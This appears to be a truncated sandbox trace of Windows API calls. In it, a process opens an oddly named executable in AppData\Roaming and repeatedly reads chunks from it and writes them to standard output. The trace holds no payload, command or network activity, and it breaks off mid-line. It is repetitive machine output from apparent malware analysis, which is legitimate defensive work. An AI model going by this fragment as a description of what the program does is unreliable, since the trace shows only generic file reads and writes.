[0092.898] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0092.898] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e45c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0092.898] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] GetFileType (hFile=0x54) returned 0x1 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e4b4 | out: lpFileSizeHigh=0x16e4b4*=0x0) returned 0x7d600 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.898] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.898] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.898] GetFileType (hFile=0x4c) returned 0x1 [0092.898] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.898] GetFileType (hFile=0x4c) returned 0x1 [0092.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.899] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.899] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.899] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.900] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.900] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.900] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.900] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] GetFileType (hFile=0x4c) returned 0x1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.901] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.901] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.901] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.901] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.902] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.902] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.902] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.902] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.903] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.903] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.903] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.903] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.904] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.904] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] GetFileType (hFile=0x4c) returned 0x1 [0092.904] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.904] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.905] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.905] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] GetFileType (hFile=0x4c) returned 0x1 [0092.905] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.905] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] GetFileType (hFile=0x4c) returned 0x1 [0092.906] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.906] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.906] _get_osfhandle 